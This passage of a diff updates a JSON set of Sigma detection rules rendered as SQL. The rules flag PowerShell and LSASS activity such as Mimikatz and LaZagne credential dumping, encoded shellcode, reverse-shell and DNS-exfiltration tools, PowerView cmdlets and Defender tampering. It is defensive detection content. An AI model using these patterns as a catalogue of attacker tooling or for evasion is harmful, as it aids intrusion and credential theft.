'%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + 
"id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' 
ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", 
@@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), 
Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", 
@@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - 
"id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + 
"filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText 
LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE 